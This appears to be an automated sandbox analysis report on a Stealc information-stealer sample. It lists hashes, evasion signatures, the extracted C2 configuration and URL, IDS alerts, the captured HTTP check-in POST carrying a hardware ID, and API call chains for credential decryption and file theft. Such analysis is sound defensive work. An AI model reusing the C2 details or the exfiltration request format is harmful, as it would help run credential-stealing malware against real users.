Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561772
MD5:cb78b3cf97d74f0540679225a564e8b0
SHA1:95b72e4eb9f28a6534e1d902f802f2988ad6735f
SHA256:3427282a0e679abf14880c48f47728c97e1c3f870d1bf3bc0116736f3abde675
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CB78B3CF97D74F0540679225A564E8B0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7516JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7516JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T09:25:06.783371+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phpUNAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7516.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_002B4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_002D40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_002B60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_002C6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_002BEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_002B9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_002C6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_002B9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_002B7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002C18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002CE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002C4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002C23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002BDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002BDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_002C2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002CCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002CD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_002CDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002B16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002B16B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 41 36 39 45 39 46 39 38 38 34 31 33 34 30 30 39 33 31 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="hwid"D7A69E9F98841340093196------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build"mars------KFHJJJKKFHIDAAKFBFBF--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_002B6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 41 36 39 45 39 46 39 38 38 34 31 33 34 30 30 39 33 31 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="hwid"D7A69E9F98841340093196------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build"mars------KFHJJJKKFHIDAAKFBFBF--
              Source: file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/3
              Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/J
              Source: file.exe, 00000000.00000002.1780359810.00000000011F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-
              Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpQ
              Source: file.exe, 00000000.00000002.1780359810.00000000011F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUN
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_002B9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C885F0_2_006C885F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D48B00_2_002D48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055510D0_2_0055510D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E13A0_2_0066E13A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006641020_2_00664102
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065BA5A0_2_0065BA5A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C2AC00_2_005C2AC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B8B780_2_005B8B78
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065A3FE0_2_0065A3FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065F4010_2_0065F401
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065D4F80_2_0065D4F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006625420_2_00662542
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066954B0_2_0066954B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073EE460_2_0073EE46
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063FEC00_2_0063FEC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067174A0_2_0067174A
